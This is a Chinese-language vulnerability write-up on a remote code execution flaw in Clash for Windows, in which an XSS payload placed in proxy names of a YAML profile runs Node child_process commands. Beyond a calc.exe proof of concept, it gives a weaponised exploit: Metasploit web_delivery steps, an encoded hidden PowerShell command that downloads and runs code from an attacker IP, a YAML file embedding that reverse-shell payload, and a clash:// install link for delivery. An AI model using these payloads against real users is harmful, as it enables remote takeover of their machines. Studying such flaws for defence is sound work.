0x01 漏洞描述
clash for windows是一个使用 Go 语言编写,基于规则的跨平台代理软件核心程序。 Clash for Windows 是运行在 Windows 上的一图形化 Clash 分支。通过 Clash API 来配置和控制 Clash 核心程序,便于用户可视化操作和使用。
下载链接
https://github.com/Fndroid/clash_for_windows_pkg/releases
目前最新版本为V 0.20.12。
Windows 上的 clash_for_windows 在订阅一个恶意链接时存在远程命令执行漏洞。代理规则配置文件中未设置严格的输入检测,攻击者可通过构造代理配置文件中的 XSS Payload 来执行任意 javascript 命令。
0x02 漏洞影响
影响版本版本:< V 0.20.12V
操作系统:Windows x64
系统版本:Windows 11
风险等级:高危
0x03 漏洞复现
本次漏洞复现使用的版本为v 0.18.8 系统为Windows10
新建 poc.yaml 文件,内容如下:
port: 7890
socks-port: 7891
allow-lan: true
mode: Rule
log-level: info
external-controller: :9090
proxies:
- name: a<img/src="1"/onerror=eval(`require("child_process").exec("calc.exe");`);>
type: socks5
server: 127.0.0.1
port: "17938"
skip-cert-verify: true
- name: abc
type: socks5
server: 127.0.0.1
port: "8088"
skip-cert-verify: true
proxy-groups:
-
name: <img/src="1"/onerror=eval(`require("child_process").exec("calc.exe");`);>
type: select
proxies:
- a<img/src="1"/onerror=eval(`require("child_process").exec("calc.exe");`);>
打开clash,进入Profiles,点击 import 导入刚刚新建的 poc.yaml 文件
点击切换到导入的 yaml 文件上
切换节点时,会弹出计算器,说明远程代码执行成功
上线msf
启动msf,搜索 web_delivery 模块
使用 exploit/multi/script/web_delivery 模块
设置 lhost
set lhost 攻击机ip
设置 target
设置 payload
生成反弹shell的payload
powershell.exe -nop -w hidden -e WwBOAGUAdAAuAFMAZQByAHYAaQBjAGUAUABvAGkAbgB0AE0AYQBuAGEAZwBlAHIAXQA6ADoAUwBlAGMAdQByAGkAdAB5AFAAcgBvAHQAbwBjAG8AbAA9AFsATgBlAHQALgBTAGUAYwB1AHIAaQB0AHkAUAByAG8AdABvAGMAbwBsAFQAeQBwAGUAXQA6ADoAVABsAHMAMQAyADsAJABjAFQAQgBrAD0AbgBlAHcALQBvAGIAagBlAGMAdAAgAG4AZQB0AC4AdwBlAGIAYwBsAGkAZQBuAHQAOwBpAGYAKABbAFMAeQBzAHQAZQBtAC4ATgBlAHQALgBXAGUAYgBQAHIAbwB4AHkAXQA6ADoARwBlAHQARABlAGYAYQB1AGwAdABQAHIAbwB4AHkAKAApAC4AYQBkAGQAcgBlAHMAcwAgAC0AbgBlACAAJABuAHUAbABsACkAewAkAGMAVABCAGsALgBwAHIAbwB4AHkAPQBbAE4AZQB0AC4AVwBlAGIAUgBlAHEAdQBlAHMAdABdADoAOgBHAGUAdABTAHkAcwB0AGUAbQBXAGUAYgBQAHIAbwB4AHkAKAApADsAJABjAFQAQgBrAC4AUAByAG8AeAB5AC4AQwByAGUAZABlAG4AdABpAGEAbABzAD0AWwBOAGUAdAAuAEMAcgBlAGQAZQBuAHQAaQBhAGwAQwBhAGMAaABlAF0AOgA6AEQAZQBmAGEAdQBsAHQAQwByAGUAZABlAG4AdABpAGEAbABzADsAfQA7AEkARQBYACAAKAAoAG4AZQB3AC0AbwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQAUwB0AHIAaQBuAGcAKAAnAGgAdAB0AHAAOgAvAC8AMQA5ADIALgAxADYAOAAuADgAMQAuADEAMAA4ADoAOAAwADgAOQAvADAAeQBhAEUASwBpAE0ANgBkAHYALwBYAHkARAB3AEwATQBtAHoAbgB4ACcAKQApADsASQBFAFgAIAAoACgAbgBlAHcALQBvAGIAagBlAGMAdAAgAE4AZQB0AC4AVwBlAGIAQwBsAGkAZQBuAHQAKQAuAEQAbwB3AG4AbABvAGEAZABTAHQAcgBpAG4AZwAoACcAaAB0AHQAcAA6AC8ALwAxADkAMgAuADEANgA4AC4AOAAxAC4AMQAwADgAOgA4ADAAOAA5AC8AMAB5AGEARQBLAGkATQA2AGQAdgAnACkAKQA7AA==
制作exp
port: 7890
socks-port: 7891
allow-lan: true
mode: Rule
log-level: info
external-controller: :9090
proxies:
- name: a<img/src="1"/onerror='eval(new Buffer(`Y29uc3QgdGVuZXQgPSByZXF1aXJlKCdjaGlsZF9wcm9jZXNzJykuZXhlYygncG93ZXJzaGVsbC5leGUgLW5vcCAtdyBoaWRkZW4gLWUgV3dCT0FHVUFkQUF1QUZNQVpRQnlBSFlBYVFCakFHVUFVQUJ2QUdrQWJnQjBBRTBBWVFCdUFHRUFad0JsQUhJQVhRQTZBRG9BVXdCbEFHTUFkUUJ5QUdrQWRBQjVBRkFBY2dCdkFIUUFid0JqQUc4QWJBQTlBRnNBVGdCbEFIUUFMZ0JUQUdVQVl3QjFBSElBYVFCMEFIa0FVQUJ5QUc4QWRBQnZBR01BYndCc0FGUUFlUUJ3QUdVQVhRQTZBRG9BVkFCc0FITUFNUUF5QURzQUpBQmpBRlFBUWdCckFEMEFiZ0JsQUhjQUxRQnZBR0lBYWdCbEFHTUFkQUFnQUc0QVpRQjBBQzRBZHdCbEFHSUFZd0JzQUdrQVpRQnVBSFFBT3dCcEFHWUFLQUJiQUZNQWVRQnpBSFFBWlFCdEFDNEFUZ0JsQUhRQUxnQlhBR1VBWWdCUUFISUFid0I0QUhrQVhRQTZBRG9BUndCbEFIUUFSQUJsQUdZQVlRQjFBR3dBZEFCUUFISUFid0I0QUhrQUtBQXBBQzRBWVFCa0FHUUFjZ0JsQUhNQWN3QWdBQzBBYmdCbEFDQUFKQUJ1QUhVQWJBQnNBQ2tBZXdBa0FHTUFWQUJDQUdzQUxnQndBSElBYndCNEFIa0FQUUJiQUU0QVpRQjBBQzRBVndCbEFHSUFVZ0JsQUhFQWRRQmxBSE1BZEFCZEFEb0FPZ0JIQUdVQWRBQlRBSGtBY3dCMEFHVUFiUUJYQUdVQVlnQlFBSElBYndCNEFIa0FLQUFwQURzQUpBQmpBRlFBUWdCckFDNEFVQUJ5QUc4QWVBQjVBQzRBUXdCeUFHVUFaQUJsQUc0QWRBQnBBR0VBYkFCekFEMEFXd0JPQUdVQWRBQXVBRU1BY2dCbEFHUUFaUUJ1QUhRQWFRQmhBR3dBUXdCaEFHTUFhQUJsQUYwQU9nQTZBRVFBWlFCbUFHRUFkUUJzQUhRQVF3QnlBR1VBWkFCbEFHNEFkQUJwQUdFQWJBQnpBRHNBZlFBN0FFa0FSUUJZQUNBQUtBQW9BRzRBWlFCM0FDMEFid0JpQUdvQVpRQmpBSFFBSUFCT0FHVUFkQUF1QUZjQVpRQmlBRU1BYkFCcEFHVUFiZ0IwQUNrQUxnQkVBRzhBZHdCdUFHd0Fid0JoQUdRQVV3QjBBSElBYVFCdUFHY0FLQUFuQUdnQWRBQjBBSEFBT2dBdkFDOEFNUUE1QURJQUxnQXhBRFlBT0FBdUFEZ0FNUUF1QURFQU1BQTRBRG9BT0FBd0FEZ0FPUUF2QURBQWVRQmhBRVVBU3dCcEFFMEFOZ0JrQUhZQUx3QllBSGtBUkFCM0FFd0FUUUJ0QUhvQWJnQjRBQ2NBS1FBcEFEc0FTUUJGQUZnQUlBQW9BQ2dBYmdCbEFIY0FMUUJ2QUdJQWFnQmxBR01BZEFBZ0FFNEFaUUIwQUM0QVZ3QmxBR0lBUXdCc0FHa0FaUUJ1QUhRQUtRQXVBRVFBYndCM0FHNEFiQUJ2QUdFQVpBQlRBSFFBY2dCcEFHNEFad0FvQUNjQWFBQjBBSFFBY0FBNkFDOEFMd0F4QURrQU1nQXVBREVBTmdBNEFDNEFPQUF4QUM0QU1RQXdBRGdBT2dBNEFEQUFPQUE1QUM4QU1BQjVBR0VBUlFCTEFHa0FUUUEyQUdRQWRnQW5BQ2tBS1FBN0FBPT0nKTs=`,`base64`).toString())'>
type: socks5
server: 127.0.0.1
port: "17938"
skip-cert-verify: true
- name: abc
type: socks5
server: 127.0.0.1
port: "8088"
skip-cert-verify: true
proxy-groups:
-
name: <img/src="1"/onerror='eval(new Buffer(`Y29uc3QgdGVuZXQgPSByZXF1aXJlKCdjaGlsZF9wcm9jZXNzJykuZXhlYygncG93ZXJzaGVsbC5leGUgLW5vcCAtdyBoaWRkZW4gLWUgV3dCT0FHVUFkQUF1QUZNQVpRQnlBSFlBYVFCakFHVUFVQUJ2QUdrQWJnQjBBRTBBWVFCdUFHRUFad0JsQUhJQVhRQTZBRG9BVXdCbEFHTUFkUUJ5QUdrQWRBQjVBRkFBY2dCdkFIUUFid0JqQUc4QWJBQTlBRnNBVGdCbEFIUUFMZ0JUQUdVQVl3QjFBSElBYVFCMEFIa0FVQUJ5QUc4QWRBQnZBR01BYndCc0FGUUFlUUJ3QUdVQVhRQTZBRG9BVkFCc0FITUFNUUF5QURzQUpBQmpBRlFBUWdCckFEMEFiZ0JsQUhjQUxRQnZBR0lBYWdCbEFHTUFkQUFnQUc0QVpRQjBBQzRBZHdCbEFHSUFZd0JzQUdrQVpRQnVBSFFBT3dCcEFHWUFLQUJiQUZNQWVRQnpBSFFBWlFCdEFDNEFUZ0JsQUhRQUxnQlhBR1VBWWdCUUFISUFid0I0QUhrQVhRQTZBRG9BUndCbEFIUUFSQUJsQUdZQVlRQjFBR3dBZEFCUUFISUFid0I0QUhrQUtBQXBBQzRBWVFCa0FHUUFjZ0JsQUhNQWN3QWdBQzBBYmdCbEFDQUFKQUJ1QUhVQWJBQnNBQ2tBZXdBa0FHTUFWQUJDQUdzQUxnQndBSElBYndCNEFIa0FQUUJiQUU0QVpRQjBBQzRBVndCbEFHSUFVZ0JsQUhFQWRRQmxBSE1BZEFCZEFEb0FPZ0JIQUdVQWRBQlRBSGtBY3dCMEFHVUFiUUJYQUdVQVlnQlFBSElBYndCNEFIa0FLQUFwQURzQUpBQmpBRlFBUWdCckFDNEFVQUJ5QUc4QWVBQjVBQzRBUXdCeUFHVUFaQUJsQUc0QWRBQnBBR0VBYkFCekFEMEFXd0JPQUdVQWRBQXVBRU1BY2dCbEFHUUFaUUJ1QUhRQWFRQmhBR3dBUXdCaEFHTUFhQUJsQUYwQU9nQTZBRVFBWlFCbUFHRUFkUUJzQUhRQVF3QnlBR1VBWkFCbEFHNEFkQUJwQUdFQWJBQnpBRHNBZlFBN0FFa0FSUUJZQUNBQUtBQW9BRzRBWlFCM0FDMEFid0JpQUdvQVpRQmpBSFFBSUFCT0FHVUFkQUF1QUZjQVpRQmlBRU1BYkFCcEFHVUFiZ0IwQUNrQUxnQkVBRzhBZHdCdUFHd0Fid0JoQUdRQVV3QjBBSElBYVFCdUFHY0FLQUFuQUdnQWRBQjBBSEFBT2dBdkFDOEFNUUE1QURJQUxnQXhBRFlBT0FBdUFEZ0FNUUF1QURFQU1BQTRBRG9BT0FBd0FEZ0FPUUF2QURBQWVRQmhBRVVBU3dCcEFFMEFOZ0JrQUhZQUx3QllBSGtBUkFCM0FFd0FUUUJ0QUhvQWJnQjRBQ2NBS1FBcEFEc0FTUUJGQUZnQUlBQW9BQ2dBYmdCbEFIY0FMUUJ2QUdJQWFnQmxBR01BZEFBZ0FFNEFaUUIwQUM0QVZ3QmxBR0lBUXdCc0FHa0FaUUJ1QUhRQUtRQXVBRVFBYndCM0FHNEFiQUJ2QUdFQVpBQlRBSFFBY2dCcEFHNEFad0FvQUNjQWFBQjBBSFFBY0FBNkFDOEFMd0F4QURrQU1nQXVBREVBTmdBNEFDNEFPQUF4QUM0QU1RQXdBRGdBT2dBNEFEQUFPQUE1QUM4QU1BQjVBR0VBUlFCTEFHa0FUUUEyQUdRQWRnQW5BQ2tBS1FBN0FBPT0nKTs=`,`base64`).toString())'>
type: select
proxies:
- a<img/src="1"/onerror='eval(new Buffer(`Y29uc3QgdGVuZXQgPSByZXF1aXJlKCdjaGlsZF9wcm9jZXNzJykuZXhlYygncG93ZXJzaGVsbC5leGUgLW5vcCAtdyBoaWRkZW4gLWUgV3dCT0FHVUFkQUF1QUZNQVpRQnlBSFlBYVFCakFHVUFVQUJ2QUdrQWJnQjBBRTBBWVFCdUFHRUFad0JsQUhJQVhRQTZBRG9BVXdCbEFHTUFkUUJ5QUdrQWRBQjVBRkFBY2dCdkFIUUFid0JqQUc4QWJBQTlBRnNBVGdCbEFIUUFMZ0JUQUdVQVl3QjFBSElBYVFCMEFIa0FVQUJ5QUc4QWRBQnZBR01BYndCc0FGUUFlUUJ3QUdVQVhRQTZBRG9BVkFCc0FITUFNUUF5QURzQUpBQmpBRlFBUWdCckFEMEFiZ0JsQUhjQUxRQnZBR0lBYWdCbEFHTUFkQUFnQUc0QVpRQjBBQzRBZHdCbEFHSUFZd0JzQUdrQVpRQnVBSFFBT3dCcEFHWUFLQUJiQUZNQWVRQnpBSFFBWlFCdEFDNEFUZ0JsQUhRQUxnQlhBR1VBWWdCUUFISUFid0I0QUhrQVhRQTZBRG9BUndCbEFIUUFSQUJsQUdZQVlRQjFBR3dBZEFCUUFISUFid0I0QUhrQUtBQXBBQzRBWVFCa0FHUUFjZ0JsQUhNQWN3QWdBQzBBYmdCbEFDQUFKQUJ1QUhVQWJBQnNBQ2tBZXdBa0FHTUFWQUJDQUdzQUxnQndBSElBYndCNEFIa0FQUUJiQUU0QVpRQjBBQzRBVndCbEFHSUFVZ0JsQUhFQWRRQmxBSE1BZEFCZEFEb0FPZ0JIQUdVQWRBQlRBSGtBY3dCMEFHVUFiUUJYQUdVQVlnQlFBSElBYndCNEFIa0FLQUFwQURzQUpBQmpBRlFBUWdCckFDNEFVQUJ5QUc4QWVBQjVBQzRBUXdCeUFHVUFaQUJsQUc0QWRBQnBBR0VBYkFCekFEMEFXd0JPQUdVQWRBQXVBRU1BY2dCbEFHUUFaUUJ1QUhRQWFRQmhBR3dBUXdCaEFHTUFhQUJsQUYwQU9nQTZBRVFBWlFCbUFHRUFkUUJzQUhRQVF3QnlBR1VBWkFCbEFHNEFkQUJwQUdFQWJBQnpBRHNBZlFBN0FFa0FSUUJZQUNBQUtBQW9BRzRBWlFCM0FDMEFid0JpQUdvQVpRQmpBSFFBSUFCT0FHVUFkQUF1QUZjQVpRQmlBRU1BYkFCcEFHVUFiZ0IwQUNrQUxnQkVBRzhBZHdCdUFHd0Fid0JoQUdRQVV3QjBBSElBYVFCdUFHY0FLQUFuQUdnQWRBQjBBSEFBT2dBdkFDOEFNUUE1QURJQUxnQXhBRFlBT0FBdUFEZ0FNUUF1QURFQU1BQTRBRG9BT0FBd0FEZ0FPUUF2QURBQWVRQmhBRVVBU3dCcEFFMEFOZ0JrQUhZQUx3QllBSGtBUkFCM0FFd0FUUUJ0QUhvQWJnQjRBQ2NBS1FBcEFEc0FTUUJGQUZnQUlBQW9BQ2dBYmdCbEFIY0FMUUJ2QUdJQWFnQmxBR01BZEFBZ0FFNEFaUUIwQUM0QVZ3QmxBR0lBUXdCc0FHa0FaUUJ1QUhRQUtRQXVBRVFBYndCM0FHNEFiQUJ2QUdFQVpBQlRBSFFBY2dCcEFHNEFad0FvQUNjQWFBQjBBSFFBY0FBNkFDOEFMd0F4QURrQU1nQXVBREVBTmdBNEFDNEFPQUF4QUM0QU1RQXdBRGdBT2dBNEFEQUFPQUE1QUM4QU1BQjVBR0VBUlFCTEFHa0FUUUEyQUdRQWRnQW5BQ2tBS1FBN0FBPT0nKTs=`,`base64`).toString())'>
将exp放到攻击机(kali)的根目录下
在clash中导入
点击切换到导入的 yaml 文件上
切换节点时,就能上线msf
0x04 漏洞分析
crash_for_windows由 Electron 提供支持,该产品在代理规则配置文件中未设置严格的输入检测,攻击者可通过构造代理配置文件中的XSS Payload来执行任意JavaScript命令。
"proxies"中的"name"字段嵌入html标签,"onerror"时触发语句执行。
- name: a<img/src="1"/onerror=eval(`require("child_process").exec("calc.exe");`);>
此外也可以使用本地导入的方式,将yaml的配置文件导入。
另一种方式使用浏览器弹窗进行操作。
clash://install-config?url=http://ip:port/eval.txt&name=RCE
0x05 修复建议
升级到最新版本
0x06 参考链接
https://github.com/Fndroid/clash_for_windows_pkg/issues/2710
https://blog.csdn.net/WEARE001/article/details/123146639
https://mp.weixin.qq.com/s/-jmAXSWOpncnLCWFEAiVgQ